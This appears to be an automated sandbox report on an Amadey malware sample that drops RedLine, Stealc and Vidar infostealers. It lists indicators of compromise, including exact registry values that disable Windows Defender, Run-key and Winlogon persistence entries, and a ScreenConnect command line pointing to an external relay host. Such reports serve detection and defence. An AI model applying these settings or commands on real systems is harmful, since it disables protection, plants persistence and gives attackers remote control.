amadey | hxxp://185[.]215[.]113[.]40/duna/random[.]exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\ProgramData\\Samsung\\svdhost.exe\",\"C:\\Users\\Admin\\AppData\\Roaming\\Fsdisk\\Moderax\\svdhost.exe\",\"C:\\Users\\Admin\\AppData\\Local\\Alexa\\Virtual\\csrr.exe\""	mbg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\ProgramData\\Samsung\\svdhost.exe\",\"C:\\Users\\Admin\\AppData\\Roaming\\Fsdisk\\Moderax\\svdhost.exe\",\"C:\\Users\\Admin\\AppData\\Local\\Alexa\\Virtual\\csrr.exe\""	Process not Found

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 2 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	Process not Found

Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Process not Found

Modifies Windows Defender TamperProtection settings 3 TTPs 2 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	Process not Found

Modifies Windows Defender notification settings 3 TTPs 3 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Process not Found

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/4728-5368-0x0000025BD4B00000-0x0000025BD4B52000-memory.dmp	family_redline

Redline family
redline
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2N2602.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3P97i.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bgUvqLl.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Y9WG5Ep.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	E3WGlpL.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found

Blocklisted process makes network request 2 IoCs

flow	pid	Process
535	51048	Process not Found
550	70472	Process not Found

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
51048	Process not Found
70472	Process not Found
66232	Process not Found
67560	Process not Found
68648	Process not Found

Downloads MZ/PE file 31 IoCs

flow	pid	Process
733	2132	rapes.exe
811	2132	rapes.exe
83	2132	rapes.exe
83	2132	rapes.exe
83	2132	rapes.exe
206	348	3P97i.exe
206	348	3P97i.exe
206	348	3P97i.exe
206	348	3P97i.exe
701	168260	Process not Found
752	2132	rapes.exe
752	2132	rapes.exe
759	11172	Process not Found
8	1340	msedge.exe
220	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
420	2132	rapes.exe
535	51048	Process not Found
550	70472	Process not Found

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

credential_access stealer

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=9b793bd7-7c45-46c7-b097-24a34c727ea6&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAKuzn3o%2bMrU2S52MaERrcVwAAAAACAAAAAAAQZgAAAAEAACAAAABlbnUaPra5R1gy1xzn3EqQIruCrSp2PmzBGGaJH7IEQgAAAAAOgAAAAAIAACAAAABtHIQ8t0Wvystue3odhF%2fdhjWgGsWY1EU8gOmB1IZcJaAEAABCa2KP%2boJn6kPPNtDzo9Zd%2bIUXNI3BQF0GS8%2faR46ibmuDMqXDsCf8vn4Zs1d4Ma8DKf8q3flhR8IRWO6tpMWaZvAI9dreeDKvUEZrKYVAEH%2bNYVQ9yBNzGvrCxlaoeZXDdZQfqI%2boVJwqKRLUCB6J%2b6WxXS9V2zGgJU9fSbDiiNFipSwxJgq5DA255qJXpmbfnLJ7%2fvgaAsCtX9Qw5Ui7NhlxNlRWljaUMHN2raz9%2fhuoWu9mVZmD%2bBcybd%2b0156LAmGMBaRE0KqLUDEKtLeObJDgd37eh9U4%2fSli%2fWvoW%2fis%2f6K5IV5sNpzZXdGEC0H8XAA794%2b2q5BJD8gHhovCRNgCMkm2aOoXnAggiZ0OiJI7UKdLhffPi0VclJiqaer4QWM%2bwvyTTC9aVI6pWPPCh%2fuXinVDlL0ErbIars2Rjmlej%2fzM8Y%2fBqysZAWzXR0ngEBXWab7TmkptKSDsb5nb9wElsp07aI%2bCEGIhnw1VZIZK4dUYRBniHP8Vh63M0FqRKHNsREX6rvcxnSNeOxCnBgs0AUjPH%2fUeRl2Fuxjn0QdwxptOS3POIcUYbI6b9t6MEkTStcfWY3jr6XK22pQ6NKeFe05RYay2mhagG7uHAuTz2S35SXNnIR%2flnB3kGRoqqixvtWG66oHAzv5Y26naXJWOuaRAzaqluy%2bBlFgCQqNA%2fmwqZZnyEcm6cClyAhsmRPK4f014lsVZhIryf9yAjb8R6sH8ThZuztxihgZQKs13B9RgUDHOUWzmzEdUAIc4AB7DwvaCvDp07HxtZar%2blosQ7eTdNKZj1aCMMKE5Eyy9UrK%2fQtPdYY5ESXMq1Hb%2b2y5GPRsD%2boCChZJle3gb5GnnMq1OZZDei0C%2f8i8ZDaqnuwUyP%2bsBrG3aoQpY2szEyRcoOp0UpgJQUI%2fXSlDM%2bEBANv%2b6uPLrL1gCK7us3UHduqVZoJkd5rr6eqwRNRu%2btI%2fzWY9Az0%2bTnivVYNi%2b%2bHB4CDaUlp3p3a2gc5h74iV%2bX7STKsfn6Nml6tCwDc992vwD39dYklPLjWw2Tmrt7AYD3Nmdf4BkyUChWS4BdgvyVm8xCdKC9S7kANhNaYazpZlzcwpY5I8Hqt2YtzYiP1vsZWsxfscj51885E7NeOXy7hy3SdbkLYOUM6fJb93nS%2ftdxnrqLmLTba0IHUOYun1o5YknHiyv%2fi3kZXG70Bp%2bOKwjwpbQ%2b2SVtcmDfJjebM%2bv4yWNdBc6MmNBELrZppR2ECMmMBC5dB7UfKQq5chmeWtStclLcrZrhOUs%2f5CmV4mi5c5OFrtYiKPNvbVmkE632YMhWq8tun7qGM0JK9oxWE3gHwMJ1l5NTFT2LQsk5yxe5j1rVpTWaArJvCvqIkshbIS8p53FOemok2vBQ00Ls9GkLpVSKYP%2bVb0vlrH4g%2f2dmWMshR8yhL00yRPSllQXBPKMllHpKZh5yjhe1rYNcdcmU%2brhKcEpZKyFPoc7sOMjZnwsX6K88F7INffoDOqfmQptsWYt4UANm23ArbUKZ5fYK6KpDUNAhb3CbpcP1T6qlan6e5oqPFn%2f%2b7kQLsmp0aL46gEDry23q4LLdUAAAAAJJ%2bI%2fQhIudEEboaFqukfX4S7ftO%2bh3SQofruHbPTC569e6BKi%2fz8SU7gY6HJp%2b8IavNtNjNIcYldjO4Gkjt%2bR&c=test&c=&c=&c=&c=&c=&c=&c=\""	ScreenConnect.ClientService.exe

Uses browser remote debugging 2 TTPs 63 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
2448	msedge.exe
1172	msedge.exe
1088	msedge.exe
6836	msedge.exe
5544	msedge.exe
1416	msedge.exe
6300	msedge.exe
5620	msedge.exe
6456	msedge.exe
4448	msedge.exe
6008	msedge.exe
6104	msedge.exe
5228	chrome.exe
5964	chrome.exe
6452	chrome.exe
4736	msedge.exe
1664	msedge.exe
5436	chrome.exe
3304	msedge.exe
6964	msedge.exe
3408	msedge.exe
648	msedge.exe
4804	msedge.exe
5816	chrome.exe
6664	msedge.exe
2092	msedge.exe
3672	chrome.exe
7036	msedge.exe
6788	msedge.exe
6332	msedge.exe
732	msedge.exe
5876	msedge.exe
1420	msedge.exe
4244	msedge.exe
6648	msedge.exe
5240	chrome.exe
4996	msedge.exe
1128	msedge.exe
6436	msedge.exe
162112	Process not Found
166772	Process not Found
5384	msedge.exe
5468	msedge.exe
1476	msedge.exe
3852	msedge.exe
5748	msedge.exe
161848	Process not Found
6832	msedge.exe
6244	msedge.exe
548	msedge.exe
1720	chrome.exe
7084	msedge.exe
155836	Process not Found
5596	chrome.exe
6628	msedge.exe
1356	msedge.exe
3876	msedge.exe
3500	msedge.exe
161840	Process not Found
6740	msedge.exe
5972	chrome.exe
7064	msedge.exe
7012	msedge.exe

Checks BIOS information in registry 2 TTPs 26 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3P97i.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3P97i.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Y9WG5Ep.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	E3WGlpL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2N2602.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2N2602.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bgUvqLl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	E3WGlpL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bgUvqLl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Y9WG5Ep.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Control Panel\International\Geo\Nation	1J19x2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Control Panel\International\Geo\Nation	q3na5Mc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Control Panel\International\Geo\Nation	67e0HNq.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Control Panel\International\Geo\Nation	Process not Found

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

pid	Process
3740	random.exe
4700	C4O51.exe
3316	1J19x2.exe
2132	rapes.exe
224	2N2602.exe
4692	q3na5Mc.exe
348	3P97i.exe
468	q3na5Mc.exe
5264	bgUvqLl.exe
6872	rapes.exe
6516	Y9WG5Ep.exe
1344	42cec0179c.exe
5108	42cec0179c.exe
6992	rapes.exe
5212	rapes.exe
2716	mbg.exe
7116	mbg.exe
1312	E3WGlpL.exe
6432	mpc.exe
2896	mpc.exe
7056	mpc.exe
5848	6NPpGdC.exe
2540	6NPpGdC.exe
6496	VBUN8fn.exe
1864	rapes.exe
1776	67e0HNq.exe
6940	imfsCjY.exe
456	imfsCjY.exe
4728	xqWgymz.exe
6172	ScreenConnect.ClientService.exe
4436	ScreenConnect.WindowsClient.exe
4808	ScreenConnect.WindowsClient.exe
6708	Dyshh8M.exe
224	Dyshh8M.exe
5992	Dyshh8M.exe
4616	Dyshh8M.exe
5932	Dyshh8M.exe
216	Dyshh8M.exe
4748	Dyshh8M.exe
3100	Dyshh8M.exe
1776	Dyshh8M.exe
3872	Dyshh8M.exe
4972	Dyshh8M.exe
5632	Dyshh8M.exe
5616	Dyshh8M.exe
5808	Dyshh8M.exe
6868	Dyshh8M.exe
4148	Dyshh8M.exe
720	Dyshh8M.exe
2800	Dyshh8M.exe
5224	Dyshh8M.exe
5920	Dyshh8M.exe
7004	Dyshh8M.exe
3588	Dyshh8M.exe
5484	Dyshh8M.exe
3756	Dyshh8M.exe
6892	Dyshh8M.exe
3160	Dyshh8M.exe
4344	Dyshh8M.exe
4680	Dyshh8M.exe
5548	Dyshh8M.exe
6488	Dyshh8M.exe
3048	Dyshh8M.exe
3012	Dyshh8M.exe

Identifies Wine through registry keys 2 TTPs 13 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	3P97i.exe
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	bgUvqLl.exe
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	2N2602.exe
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	Y9WG5Ep.exe
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	E3WGlpL.exe
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Software\Wine	Process not Found

Loads dropped DLL 64 IoCs

pid	Process
348	3P97i.exe
348	3P97i.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
7116	mbg.exe
4088	MsiExec.exe
5452	rundll32.exe
5452	rundll32.exe
5452	rundll32.exe
5452	rundll32.exe
5452	rundll32.exe
5452	rundll32.exe
5452	rundll32.exe
5452	rundll32.exe
5452	rundll32.exe
2372	MsiExec.exe
408	MsiExec.exe
6172	ScreenConnect.ClientService.exe
6172	ScreenConnect.ClientService.exe
6172	ScreenConnect.ClientService.exe
6172	ScreenConnect.ClientService.exe
6172	ScreenConnect.ClientService.exe
6172	ScreenConnect.ClientService.exe
6172	ScreenConnect.ClientService.exe
6172	ScreenConnect.ClientService.exe
6172	ScreenConnect.ClientService.exe
6172	ScreenConnect.ClientService.exe
143416	Process not Found
143584	Process not Found
143584	Process not Found

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 3 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	Process not Found

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8ceae44585.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035090101\\8ceae44585.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ecf060668e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035100101\\ecf060668e.exe"	rapes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	random.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	C4O51.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f44bd6eb1d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035051101\\f44bd6eb1d.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035060121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8bce00488c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035080101\\8bce00488c.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\Z:	Process not Found
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\V:	Process not Found
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\W:	Process not Found
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	Process not Found
File opened (read-only)	\??\Y:	Process not Found
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	Process not Found
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\K:	Process not Found
File opened (read-only)	\??\S:	Process not Found
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	Process not Found
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	Process not Found
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\T:	Process not Found
File opened (read-only)	\??\D:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\D:	Process not Found
File opened (read-only)	\??\O:	Process not Found
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\G:	Process not Found
File opened (read-only)	\??\J:	Process not Found
File opened (read-only)	\??\M:	Process not Found
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\D:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	Process not Found
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	Process not Found
File opened (read-only)	\??\N:	Process not Found
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	Process not Found
File opened (read-only)	\??\P:	Process not Found

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
795	ip-api.com
516	api.ipify.org
517	api.ipify.org
518	ip-api.com
792	api.ipify.org
793	api.ipify.org

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0004000000006ae1-5423.dat	autoit_exe
behavioral1/files/0x000c00000002812d-5592.dat	autoit_exe

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

Authentication Package

